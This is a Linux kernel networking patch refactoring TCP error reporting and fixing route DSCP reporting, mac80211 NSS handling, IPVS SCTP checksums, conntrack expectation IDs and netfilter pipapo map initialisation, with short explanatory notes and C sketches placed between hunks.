+ 			.flowi4_oif = rt->dst.dev->ifindex,
+ 			.flowi4_iif = skb->dev->ifindex,
+ 			.flowi4_mark = skb->mark,
+@@ -2934,9 +2934,9 @@ EXPORT_SYMBOL_GPL(ip_route_output_tunnel);
+ 
+ /* called with rcu_read_lock held */
+ static int rt_fill_info(struct net *net, __be32 dst, __be32 src,
+-			struct rtable *rt, u32 table_id, struct flowi4 *fl4,
+-			struct sk_buff *skb, u32 portid, u32 seq,
+-			unsigned int flags)
++			struct rtable *rt, u32 table_id, dscp_t dscp,
++			struct flowi4 *fl4, struct sk_buff *skb, u32 portid,
++			u32 seq, unsigned int flags)
+ {
+ 	struct rtmsg *r;
+ 	struct nlmsghdr *nlh;
+@@ -2952,7 +2952,7 @@ static int rt_fill_info(struct net *net, __be32 dst, __be32 src,
+ 	r->rtm_family	 = AF_INET;
+ 	r->rtm_dst_len	= 32;
+ 	r->rtm_src_len	= 0;
+-	r->rtm_tos	= fl4 ? fl4->flowi4_tos : 0;
++	r->rtm_tos	= inet_dscp_to_dsfield(dscp);
+ 	r->rtm_table	= table_id < 256 ? table_id : RT_TABLE_COMPAT;
+ 	if (nla_put_u32(skb, RTA_TABLE, table_id))
+ 		goto nla_put_failure;
+@@ -3102,7 +3102,7 @@ static int fnhe_dump_bucket(struct net *net, struct sk_buff *skb,
+ 				goto next;
+ 
+ 			err = rt_fill_info(net, fnhe->fnhe_daddr, 0, rt,
+-					   table_id, NULL, skb,
++					   table_id, 0, NULL, skb,
+ 					   NETLINK_CB(cb->skb).portid,
+ 					   cb->nlh->nlmsg_seq, flags);
+ 			if (err)
+@@ -3398,7 +3398,7 @@ static int inet_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr *nlh,
+ 		fri.tb_id = table_id;
+ 		fri.dst = res.prefix;
+ 		fri.dst_len = res.prefixlen;
+-		fri.dscp = inet_dsfield_to_dscp(fl4.flowi4_tos);
++		fri.dscp = res.dscp;
+ 		fri.type = rt->rt_type;
+ 		fri.offload = 0;
+ 		fri.trap = 0;
+@@ -3425,8 +3425,8 @@ static int inet_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr *nlh,
+ 		err = fib_dump_info(skb, NETLINK_CB(in_skb).portid,
+ 				    nlh->nlmsg_seq, RTM_NEWROUTE, &fri, 0);
+ 	} else {
+-		err = rt_fill_info(net, dst, src, rt, table_id, &fl4, skb,
+-				   NETLINK_CB(in_skb).portid,
++		err = rt_fill_info(net, dst, src, rt, table_id, res.dscp, &fl4,
++				   skb, NETLINK_CB(in_skb).portid,
+ 				   nlh->nlmsg_seq, 0);
+ 	}
+ 	if (err < 0)
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 2d4f697d338f5..cb79919323a62 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -589,9 +589,10 @@ __poll_t tcp_poll(struct file *file, struct socket *sock, poll_table *wait)
+ 		 */
+ 		mask |= EPOLLOUT | EPOLLWRNORM;
+ 	}
+-	/* This barrier is coupled with smp_wmb() in tcp_reset() */
++	/* This barrier is coupled with smp_wmb() in tcp_done_with_error() */
+ 	smp_rmb();
+-	if (sk->sk_err || !skb_queue_empty_lockless(&sk->sk_error_queue))
++	if (READ_ONCE(sk->sk_err) ||
++	    !skb_queue_empty_lockless(&sk->sk_error_queue))
+ 		mask |= EPOLLERR;
+ 
+ 	return mask;
+@@ -3119,7 +3120,7 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 	if (old_state == TCP_LISTEN) {
+ 		inet_csk_listen_stop(sk);
+ 	} else if (unlikely(tp->repair)) {
+-		sk->sk_err = ECONNABORTED;
++		WRITE_ONCE(sk->sk_err, ECONNABORTED);
+ 	} else if (tcp_need_reset(old_state) ||
+ 		   (tp->snd_nxt != tp->write_seq &&
+ 		    (1 << old_state) & (TCPF_CLOSING | TCPF_LAST_ACK))) {
+@@ -3127,9 +3128,9 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 		 * states
+ 		 */
+ 		tcp_send_active_reset(sk, gfp_any());
+-		sk->sk_err = ECONNRESET;
++		WRITE_ONCE(sk->sk_err, ECONNRESET);
+ 	} else if (old_state == TCP_SYN_SENT)
+-		sk->sk_err = ECONNRESET;
++		WRITE_ONCE(sk->sk_err, ECONNRESET);
+ 
+ 	tcp_clear_xmit_timers(sk);
+ 	__skb_queue_purge(&sk->sk_receive_queue);
+@@ -4735,7 +4736,7 @@ int tcp_abort(struct sock *sk, int err)
+ 	bh_lock_sock(sk);
+ 
+ 	if (!sock_flag(sk, SOCK_DEAD)) {
+-		sk->sk_err = err;
++		WRITE_ONCE(sk->sk_err, err);
+ 		/* This barrier is coupled with smp_rmb() in tcp_poll() */
+ 		smp_wmb();
+ 		sk_error_report(sk);
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 359ffda9b736b..b1b4f44d21370 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -3922,7 +3922,7 @@ static int tcp_ack(struct sock *sk, const struct sk_buff *skb, int flag)
+ 	/* We passed data and got it acked, remove any soft error
+ 	 * log. Something worked...
+ 	 */
+-	sk->sk_err_soft = 0;
++	WRITE_ONCE(sk->sk_err_soft, 0);
+ 	icsk->icsk_probes_out = 0;
+ 	tp->rcv_tstamp = tcp_jiffies32;
+ 	if (!prior_packets)
+@@ -4356,9 +4356,26 @@ static inline bool tcp_sequence(const struct tcp_sock *tp, u32 seq, u32 end_seq)
+ 		!after(seq, tp->rcv_nxt + tcp_receive_window(tp));
+ }
+ 
++
++void tcp_done_with_error(struct sock *sk, int err)
++{
++	/* This barrier is coupled with smp_rmb() in tcp_poll() */
++	WRITE_ONCE(sk->sk_err, err);
++	smp_wmb();
++
++	tcp_write_queue_purge(sk);
++	tcp_done(sk);
++
++	if (!sock_flag(sk, SOCK_DEAD))
++		sk_error_report(sk);
++}
++EXPORT_SYMBOL(tcp_done_with_error);
++
+ /* When we get a reset we do this. */
+ void tcp_reset(struct sock *sk, struct sk_buff *skb)
+ {
++	int err;
++
+ 	trace_tcp_receive_reset(sk);
+ 
+ 	/* mptcp can't tell us to ignore reset pkts,
+@@ -4370,24 +4387,17 @@ void tcp_reset(struct sock *sk, struct sk_buff *skb)
+ 	/* We want the right error as BSD sees it (and indeed as we do). */
+ 	switch (sk->sk_state) {
+ 	case TCP_SYN_SENT:
+-		sk->sk_err = ECONNREFUSED;
++		err = ECONNREFUSED;
+ 		break;
+ 	case TCP_CLOSE_WAIT:
+-		sk->sk_err = EPIPE;
++		err = EPIPE;
+ 		break;
+ 	case TCP_CLOSE:
+ 		return;
+ 	default:
+-		sk->sk_err = ECONNRESET;
++		err = ECONNRESET;
+ 	}
+-	/* This barrier is coupled with smp_rmb() in tcp_poll() */
+-	smp_wmb();
+-
+-	tcp_write_queue_purge(sk);
+-	tcp_done(sk);
+-
+-	if (!sock_flag(sk, SOCK_DEAD))
+-		sk_error_report(sk);
++	tcp_done_with_error(sk, err);
+ }
+ 
+ /*
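
tcp_done_with_error() above preserves the ordering contract the old open-coded tcp_reset() body relied on: the error must be published before the state that tcp_poll() tests, hence WRITE_ONCE() plus smp_wmb() on the writer side, paired with smp_rmb() plus READ_ONCE() in tcp_poll(). A hedged C11 sketch of that barrier pairing (names invented, not the kernel primitives themselves):

    #include <stdatomic.h>
    #include <stdio.h>

    static _Atomic int sk_err;    /* ~ sk->sk_err */
    static _Atomic int sk_done;   /* ~ the state tcp_poll() tests */

    static void writer(int err)
    {
        atomic_store_explicit(&sk_err, err, memory_order_relaxed);
        atomic_thread_fence(memory_order_release);   /* ~ smp_wmb() */
        atomic_store_explicit(&sk_done, 1, memory_order_relaxed);
    }

    static int reader(void)
    {
        if (!atomic_load_explicit(&sk_done, memory_order_relaxed))
            return 0;
        atomic_thread_fence(memory_order_acquire);   /* ~ smp_rmb() */
        return atomic_load_explicit(&sk_err, memory_order_relaxed);
    }

    int main(void)
    {
        writer(1);
        printf("err=%d\n", reader());
        return 0;
    }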
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index befa848fb820c..c64ba4f8ddaa9 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -368,7 +368,7 @@ void tcp_v4_mtu_reduced(struct sock *sk)
+ 	 * for the case, if this connection will not able to recover.
+ 	 */
+ 	if (mtu < dst_mtu(dst) && ip_dont_fragment(sk, dst))
+-		sk->sk_err_soft = EMSGSIZE;
++		WRITE_ONCE(sk->sk_err_soft, EMSGSIZE);
+ 
+ 	mtu = dst_mtu(dst);
+ 
+@@ -602,15 +602,10 @@ int tcp_v4_err(struct sk_buff *skb, u32 info)
+ 
+ 		ip_icmp_error(sk, skb, err, th->dest, info, (u8 *)th);
+ 
+-		if (!sock_owned_by_user(sk)) {
+-			sk->sk_err = err;
+-
+-			sk_error_report(sk);
+-
+-			tcp_done(sk);
+-		} else {
+-			sk->sk_err_soft = err;
+-		}
++		if (!sock_owned_by_user(sk))
++			tcp_done_with_error(sk, err);
++		else
++			WRITE_ONCE(sk->sk_err_soft, err);
+ 		goto out;
+ 	}
+ 
+@@ -632,10 +627,10 @@ int tcp_v4_err(struct sk_buff *skb, u32 info)
+ 
+ 	inet = inet_sk(sk);
+ 	if (!sock_owned_by_user(sk) && inet->recverr) {
+-		sk->sk_err = err;
++		WRITE_ONCE(sk->sk_err, err);
+ 		sk_error_report(sk);
+ 	} else	{ /* Only an error on timeout */
+-		sk->sk_err_soft = err;
++		WRITE_ONCE(sk->sk_err_soft, err);
+ 	}
+ 
+ out:
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 15f814c1e1693..19b5a6179c061 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3764,7 +3764,7 @@ static void tcp_connect_init(struct sock *sk)
+ 	tp->rx_opt.rcv_wscale = rcv_wscale;
+ 	tp->rcv_ssthresh = tp->rcv_wnd;
+ 
+-	sk->sk_err = 0;
++	WRITE_ONCE(sk->sk_err, 0);
+ 	sock_reset_flag(sk, SOCK_DONE);
+ 	tp->snd_wnd = 0;
+ 	tcp_init_wl(tp, 0);
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index 016f9eff49b40..3662b49ce71ae 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -67,11 +67,7 @@ u32 tcp_clamp_probe0_to_user_timeout(const struct sock *sk, u32 when)
+ 
+ static void tcp_write_err(struct sock *sk)
+ {
+-	sk->sk_err = sk->sk_err_soft ? : ETIMEDOUT;
+-	sk_error_report(sk);
+-
+-	tcp_write_queue_purge(sk);
+-	tcp_done(sk);
++	tcp_done_with_error(sk, READ_ONCE(sk->sk_err_soft) ? : ETIMEDOUT);
+ 	__NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPABORTONTIMEOUT);
+ }
+ 
+@@ -110,7 +106,7 @@ static int tcp_out_of_resources(struct sock *sk, bool do_reset)
+ 		shift++;
+ 
+ 	/* If some dubious ICMP arrived, penalize even more. */
+-	if (sk->sk_err_soft)
++	if (READ_ONCE(sk->sk_err_soft))
+ 		shift++;
+ 
+ 	if (tcp_check_oom(sk, shift)) {
+@@ -146,7 +142,7 @@ static int tcp_orphan_retries(struct sock *sk, bool alive)
+ 	int retries = READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_orphan_retries); /* May be zero. */
+ 
+ 	/* We know from an ICMP that something is wrong. */
+-	if (sk->sk_err_soft && !alive)
++	if (READ_ONCE(sk->sk_err_soft) && !alive)
+ 		retries = 0;
+ 
+ 	/* However, if socket sent something recently, select some safe
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 22e246ff910ee..4e1e6ef72464c 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -1831,7 +1831,8 @@ int ipv6_dev_get_saddr(struct net *net, const struct net_device *dst_dev,
+ 							    master, &dst,
+ 							    scores, hiscore_idx);
+ 
+-			if (scores[hiscore_idx].ifa)
++			if (scores[hiscore_idx].ifa &&
++			    scores[hiscore_idx].scopedist >= 0)
+ 				goto out;
+ 		}
+ 
+diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
+index c2dcb5c613b6b..a021c88d3d9b8 100644
+--- a/net/ipv6/esp6.c
++++ b/net/ipv6/esp6.c
+@@ -255,8 +255,7 @@ static int esp_output_tail_tcp(struct xfrm_state *x, struct sk_buff *skb)
+ #else
+ static int esp_output_tail_tcp(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	kfree_skb(skb);
+-
++	WARN_ON(1);
+ 	return -EOPNOTSUPP;
+ }
+ #endif
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 4b0e05349862d..eb6fc0e2a4533 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -492,13 +492,10 @@ static int tcp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 
+ 		ipv6_icmp_error(sk, skb, err, th->dest, ntohl(info), (u8 *)th);
+ 
+-		if (!sock_owned_by_user(sk)) {
+-			sk->sk_err = err;
+-			sk_error_report(sk);		/* Wake people up to see the error (see connect in sock.c) */
+-
+-			tcp_done(sk);
+-		} else
+-			sk->sk_err_soft = err;
++		if (!sock_owned_by_user(sk))
++			tcp_done_with_error(sk, err);
++		else
++			WRITE_ONCE(sk->sk_err_soft, err);
+ 		goto out;
+ 	case TCP_LISTEN:
+ 		break;
+@@ -512,11 +509,11 @@ static int tcp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	}
+ 
+ 	if (!sock_owned_by_user(sk) && np->recverr) {
+-		sk->sk_err = err;
++		WRITE_ONCE(sk->sk_err, err);
+ 		sk_error_report(sk);
+-	} else
+-		sk->sk_err_soft = err;
+-
++	} else {
++		WRITE_ONCE(sk->sk_err_soft, err);
++	}
+ out:
+ 	bh_unlock_sock(sk);
+ 	sock_put(sk);
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 2c60fc165801c..1ce8fefd7f0d7 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1775,7 +1775,7 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
+ 					      sband->band);
+ 	}
+ 
+-	ieee80211_sta_set_rx_nss(link_sta);
++	ieee80211_sta_init_nss(link_sta);
+ 
+ 	return ret;
+ }
+@@ -2577,6 +2577,17 @@ static int ieee80211_change_bss(struct wiphy *wiphy,
+ 	if (!sband)
+ 		return -EINVAL;
+ 
++	if (params->basic_rates) {
++		if (!ieee80211_parse_bitrates(sdata->vif.bss_conf.chandef.width,
++					      wiphy->bands[sband->band],
++					      params->basic_rates,
++					      params->basic_rates_len,
++					      &sdata->vif.bss_conf.basic_rates))
++			return -EINVAL;
++		changed |= BSS_CHANGED_BASIC_RATES;
++		ieee80211_check_rate_mask(&sdata->deflink);
++	}
++
+ 	if (params->use_cts_prot >= 0) {
+ 		sdata->vif.bss_conf.use_cts_prot = params->use_cts_prot;
+ 		changed |= BSS_CHANGED_ERP_CTS_PROT;
+@@ -2600,16 +2611,6 @@ static int ieee80211_change_bss(struct wiphy *wiphy,
+ 		changed |= BSS_CHANGED_ERP_SLOT;
+ 	}
+ 
+-	if (params->basic_rates) {
+-		ieee80211_parse_bitrates(sdata->vif.bss_conf.chandef.width,
+-					 wiphy->bands[sband->band],
+-					 params->basic_rates,
+-					 params->basic_rates_len,
+-					 &sdata->vif.bss_conf.basic_rates);
+-		changed |= BSS_CHANGED_BASIC_RATES;
+-		ieee80211_check_rate_mask(&sdata->deflink);
+-	}
+-
+ 	if (params->ap_isolate >= 0) {
+ 		if (params->ap_isolate)
+ 			sdata->flags |= IEEE80211_SDATA_DONT_BRIDGE_PACKETS;
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 0d8a9bb925384..709eb7bfcf194 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -2071,7 +2071,7 @@ enum ieee80211_sta_rx_bandwidth
+ ieee80211_sta_cap_rx_bw(struct link_sta_info *link_sta);
+ enum ieee80211_sta_rx_bandwidth
+ ieee80211_sta_cur_vht_bw(struct link_sta_info *link_sta);
+-void ieee80211_sta_set_rx_nss(struct link_sta_info *link_sta);
++void ieee80211_sta_init_nss(struct link_sta_info *link_sta);
+ enum ieee80211_sta_rx_bandwidth
+ ieee80211_chan_width_to_rx_bw(enum nl80211_chan_width width);
+ enum nl80211_chan_width
+diff --git a/net/mac80211/rate.c b/net/mac80211/rate.c
+index a2bc9c5d92b8b..3cf252418bd38 100644
+--- a/net/mac80211/rate.c
++++ b/net/mac80211/rate.c
+@@ -37,7 +37,7 @@ void rate_control_rate_init(struct sta_info *sta)
+ 	struct ieee80211_supported_band *sband;
+ 	struct ieee80211_chanctx_conf *chanctx_conf;
+ 
+-	ieee80211_sta_set_rx_nss(&sta->deflink);
++	ieee80211_sta_init_nss(&sta->deflink);
+ 
+ 	if (!ref)
+ 		return;
+diff --git a/net/mac80211/sta_info.h b/net/mac80211/sta_info.h
+index 2517ea714dc42..4809756a43dd1 100644
+--- a/net/mac80211/sta_info.h
++++ b/net/mac80211/sta_info.h
+@@ -3,7 +3,7 @@
+  * Copyright 2002-2005, Devicescape Software, Inc.
+  * Copyright 2013-2014  Intel Mobile Communications GmbH
+  * Copyright(c) 2015-2017 Intel Deutschland GmbH
+- * Copyright(c) 2020-2022 Intel Corporation
++ * Copyright(c) 2020-2024 Intel Corporation
+  */
+ 
+ #ifndef STA_INFO_H
+@@ -485,6 +485,8 @@ struct ieee80211_fragment_cache {
+  *	same for non-MLD STA. This is used as key for searching link STA
+  * @link_id: Link ID uniquely identifying the link STA. This is 0 for non-MLD
+  *	and set to the corresponding vif LinkId for MLD STA
++ * @op_mode_nss: NSS limit as set by operating mode notification, or 0
++ * @capa_nss: NSS limit as determined by local and peer capabilities
+  * @link_hash_node: hash node for rhashtable
+  * @sta: Points to the STA info
+  * @gtk: group keys negotiated with this station, if any
+@@ -520,6 +522,8 @@ struct link_sta_info {
+ 	u8 addr[ETH_ALEN];
+ 	u8 link_id;
+ 
++	u8 op_mode_nss, capa_nss;
++
+ 	struct rhlist_head link_hash_node;
+ 
+ 	struct sta_info *sta;
+diff --git a/net/mac80211/vht.c b/net/mac80211/vht.c
+index f7526be8a1c7e..bc13b1419981a 100644
+--- a/net/mac80211/vht.c
++++ b/net/mac80211/vht.c
+@@ -4,7 +4,7 @@
+  *
+  * Portions of this file
+  * Copyright(c) 2015 - 2016 Intel Deutschland GmbH
+- * Copyright (C) 2018 - 2023 Intel Corporation
++ * Copyright (C) 2018 - 2024 Intel Corporation
+  */
+ 
+ #include <linux/ieee80211.h>
+@@ -541,15 +541,11 @@ ieee80211_sta_cur_vht_bw(struct link_sta_info *link_sta)
+ 	return bw;
+ }
+ 
+-void ieee80211_sta_set_rx_nss(struct link_sta_info *link_sta)
++void ieee80211_sta_init_nss(struct link_sta_info *link_sta)
+ {
+ 	u8 ht_rx_nss = 0, vht_rx_nss = 0, he_rx_nss = 0, eht_rx_nss = 0, rx_nss;
+ 	bool support_160;
+ 
+-	/* if we received a notification already don't overwrite it */
+-	if (link_sta->pub->rx_nss)
+-		return;
+-
+ 	if (link_sta->pub->eht_cap.has_eht) {
+ 		int i;
+ 		const u8 *rx_nss_mcs = (void *)&link_sta->pub->eht_cap.eht_mcs_nss_supp;
+@@ -627,7 +623,15 @@ void ieee80211_sta_set_rx_nss(struct link_sta_info *link_sta)
+ 	rx_nss = max(vht_rx_nss, ht_rx_nss);
+ 	rx_nss = max(he_rx_nss, rx_nss);
+ 	rx_nss = max(eht_rx_nss, rx_nss);
+-	link_sta->pub->rx_nss = max_t(u8, 1, rx_nss);
++	rx_nss = max_t(u8, 1, rx_nss);
++	link_sta->capa_nss = rx_nss;
++
++	/* that shouldn't be set yet, but we can handle it anyway */
++	if (link_sta->op_mode_nss)
++		link_sta->pub->rx_nss =
++			min_t(u8, rx_nss, link_sta->op_mode_nss);
++	else
++		link_sta->pub->rx_nss = rx_nss;
+ }
+ 
+ u32 __ieee80211_vht_handle_opmode(struct ieee80211_sub_if_data *sdata,
+@@ -647,11 +651,20 @@ u32 __ieee80211_vht_handle_opmode(struct ieee80211_sub_if_data *sdata,
+ 	nss >>= IEEE80211_OPMODE_NOTIF_RX_NSS_SHIFT;
+ 	nss += 1;
+ 
+-	if (link_sta->pub->rx_nss != nss) {
+-		link_sta->pub->rx_nss = nss;
+-		sta_opmode.rx_nss = nss;
+-		changed |= IEEE80211_RC_NSS_CHANGED;
+-		sta_opmode.changed |= STA_OPMODE_N_SS_CHANGED;
++	if (link_sta->op_mode_nss != nss) {
++		if (nss <= link_sta->capa_nss) {
++			link_sta->op_mode_nss = nss;
++
++			if (nss != link_sta->pub->rx_nss) {
++				link_sta->pub->rx_nss = nss;
++				changed |= IEEE80211_RC_NSS_CHANGED;
++				sta_opmode.rx_nss = link_sta->pub->rx_nss;
++				sta_opmode.changed |= STA_OPMODE_N_SS_CHANGED;
++			}
++		} else {
++			pr_warn_ratelimited("Ignoring NSS change in VHT Operating Mode Notification from %pM with invalid nss %d",
++					    link_sta->pub->addr, nss);
++		}
+ 	}
+ 
+ 	switch (opmode & IEEE80211_OPMODE_NOTIF_CHANWIDTH_MASK) {
+diff --git a/net/netfilter/ipvs/ip_vs_proto_sctp.c b/net/netfilter/ipvs/ip_vs_proto_sctp.c
+index 1e689c7141271..83e452916403d 100644
+--- a/net/netfilter/ipvs/ip_vs_proto_sctp.c
++++ b/net/netfilter/ipvs/ip_vs_proto_sctp.c
+@@ -126,7 +126,7 @@ sctp_snat_handler(struct sk_buff *skb, struct ip_vs_protocol *pp,
+ 	if (sctph->source != cp->vport || payload_csum ||
+ 	    skb->ip_summed == CHECKSUM_PARTIAL) {
+ 		sctph->source = cp->vport;
+-		if (!skb_is_gso(skb) || !skb_is_gso_sctp(skb))
++		if (!skb_is_gso(skb))
+ 			sctp_nat_csum(skb, sctph, sctphoff);
+ 	} else {
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+@@ -175,7 +175,7 @@ sctp_dnat_handler(struct sk_buff *skb, struct ip_vs_protocol *pp,
+ 	    (skb->ip_summed == CHECKSUM_PARTIAL &&
+ 	     !(skb_dst(skb)->dev->features & NETIF_F_SCTP_CRC))) {
+ 		sctph->dest = cp->dport;
+-		if (!skb_is_gso(skb) || !skb_is_gso_sctp(skb))
++		if (!skb_is_gso(skb))
+ 			sctp_nat_csum(skb, sctph, sctphoff);
+ 	} else if (skb->ip_summed != CHECKSUM_PARTIAL) {
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 9ee8abd3e4b10..9672b0e00d6bf 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -3415,7 +3415,8 @@ static int ctnetlink_del_expect(struct sk_buff *skb,
+ 
+ 		if (cda[CTA_EXPECT_ID]) {
+ 			__be32 id = nla_get_be32(cda[CTA_EXPECT_ID]);
+-			if (ntohl(id) != (u32)(unsigned long)exp) {
++
++			if (id != nf_expect_get_id(exp)) {
+ 				nf_ct_expect_put(exp);
+ 				return -ENOENT;
+ 			}
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index a56ed216c2233..d9c1c467ea684 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -360,7 +360,7 @@
+  * Return: -1 on no match, bit position on 'match_only', 0 otherwise.
+  */
+ int pipapo_refill(unsigned long *map, int len, int rules, unsigned long *dst,
+-		  union nft_pipapo_map_bucket *mt, bool match_only)
++		  const union nft_pipapo_map_bucket *mt, bool match_only)
+ {
+ 	unsigned long bitset;
+ 	int k, ret = -1;
+@@ -412,9 +412,9 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+ 	struct nft_pipapo_scratch *scratch;
+ 	unsigned long *res_map, *fill_map;
+ 	u8 genmask = nft_genmask_cur(net);
++	const struct nft_pipapo_match *m;
++	const struct nft_pipapo_field *f;
+ 	const u8 *rp = (const u8 *)key;
+-	struct nft_pipapo_match *m;
+-	struct nft_pipapo_field *f;
+ 	bool map_index;
+ 	int i;
+ 
+@@ -432,7 +432,7 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+ 	res_map  = scratch->map + (map_index ? m->bsize_max : 0);
+ 	fill_map = scratch->map + (map_index ? 0 : m->bsize_max);
+ 
+-	memset(res_map, 0xff, m->bsize_max * sizeof(*res_map));
++	pipapo_resmap_init(m, res_map);
+ 
+ 	nft_pipapo_for_each_field(f, i, m) {
+ 		bool last = i == m->field_count - 1;
+@@ -519,11 +519,13 @@ static struct nft_pipapo_elem *pipapo_get(const struct net *net,
+ {
+ 	struct nft_pipapo_elem *ret = ERR_PTR(-ENOENT);
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+-	struct nft_pipapo_match *m = priv->clone;
+ 	unsigned long *res_map, *fill_map = NULL;
+-	struct nft_pipapo_field *f;
++	const struct nft_pipapo_match *m;
++	const struct nft_pipapo_field *f;
+ 	int i;
+ 
++	m = priv->clone;
++
+ 	res_map = kmalloc_array(m->bsize_max, sizeof(*res_map), GFP_ATOMIC);
+ 	if (!res_map) {
+ 		ret = ERR_PTR(-ENOMEM);
+@@ -536,7 +538,7 @@ static struct nft_pipapo_elem *pipapo_get(const struct net *net,
+ 		goto out;
+ 	}
+ 
+-	memset(res_map, 0xff, m->bsize_max * sizeof(*res_map));
++	pipapo_resmap_init(m, res_map);
+ 
+ 	nft_pipapo_for_each_field(f, i, m) {
+ 		bool last = i == m->field_count - 1;
+@@ -1595,7 +1597,7 @@ static void pipapo_gc(const struct nft_set *_set, struct nft_pipapo_match *m)
+ 
+ 	while ((rules_f0 = pipapo_rules_same_key(m->f, first_rule))) {
+ 		union nft_pipapo_map_bucket rulemap[NFT_PIPAPO_MAX_FIELDS];
+-		struct nft_pipapo_field *f;
++		const struct nft_pipapo_field *f;
+ 		int i, start, rules_fx;
+ 
+ 		start = first_rule;
+@@ -2041,8 +2043,8 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct net *net = read_pnet(&set->net);
+-	struct nft_pipapo_match *m;
+-	struct nft_pipapo_field *f;
++	const struct nft_pipapo_match *m;
++	const struct nft_pipapo_field *f;
+ 	int i, r;
+ 
+ 	rcu_read_lock();
+diff --git a/net/netfilter/nft_set_pipapo.h b/net/netfilter/nft_set_pipapo.h
+index 30a3d092cd841..519a2e6dc206f 100644
+--- a/net/netfilter/nft_set_pipapo.h
++++ b/net/netfilter/nft_set_pipapo.h
+@@ -185,7 +185,7 @@ struct nft_pipapo_elem {
+ };
+ 
+ int pipapo_refill(unsigned long *map, int len, int rules, unsigned long *dst,
+-		  union nft_pipapo_map_bucket *mt, bool match_only);
++		  const union nft_pipapo_map_bucket *mt, bool match_only);
+ 
+ /**
+  * pipapo_and_field_buckets_4bit() - Intersect 4-bit buckets
+@@ -193,7 +193,7 @@ int pipapo_refill(unsigned long *map, int len, int rules, unsigned long *dst,
+  * @dst:	Area to store result
+  * @data:	Input data selecting table buckets
+  */
+-static inline void pipapo_and_field_buckets_4bit(struct nft_pipapo_field *f,
++static inline void pipapo_and_field_buckets_4bit(const struct nft_pipapo_field *f,
+ 						 unsigned long *dst,
+ 						 const u8 *data)
+ {
+@@ -221,7 +221,7 @@ static inline void pipapo_and_field_buckets_4bit(struct nft_pipapo_field *f,
+  * @dst:	Area to store result
+  * @data:	Input data selecting table buckets
+  */
+-static inline void pipapo_and_field_buckets_8bit(struct nft_pipapo_field *f,
++static inline void pipapo_and_field_buckets_8bit(const struct nft_pipapo_field *f,
+ 						 unsigned long *dst,
+ 						 const u8 *data)
+ {
+@@ -285,4 +285,25 @@ static u64 pipapo_estimate_size(const struct nft_set_desc *desc)
+ 	return size;
+ }
+ 
++/**
++ * pipapo_resmap_init() - Initialise result map before first use
++ * @m:		Matching data, including mapping table
++ * @res_map:	Result map
++ *
++ * Initialise all bits covered by the first field to one, so that after
++ * the first step, only the matching bits of the first bit group remain.
++ *
++ * If other fields have a large bitmap, set remainder of res_map to 0.
++ */
++static inline void pipapo_resmap_init(const struct nft_pipapo_match *m, unsigned long *res_map)
++{
++	const struct nft_pipapo_field *f = m->f;
++	int i;
++
++	for (i = 0; i < f->bsize; i++)
++		res_map[i] = ULONG_MAX;
++
++	for (i = f->bsize; i < m->bsize_max; i++)
++		res_map[i] = 0ul;
++}
+ #endif /* _NFT_SET_PIPAPO_H */
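
pipapo_resmap_init() above replaces a blanket memset(0xff) over bsize_max words: only the first field's bsize words may start all-ones, since stale set bits beyond them could survive the later per-field AND/refill steps as false matches. The shape of the helper, restated as a standalone sketch:

    #include <limits.h>
    #include <stddef.h>
    #include <stdio.h>

    /* first = words used by the first field's bitmap, total = bsize_max */
    static void resmap_init(unsigned long *map, size_t first, size_t total)
    {
        size_t i;

        for (i = 0; i < first; i++)
            map[i] = ULONG_MAX;   /* every candidate is live before step one */
        for (; i < total; i++)
            map[i] = 0UL;         /* no stray matches beyond the first field */
    }

    int main(void)
    {
        unsigned long map[4];

        resmap_init(map, 1, 4);
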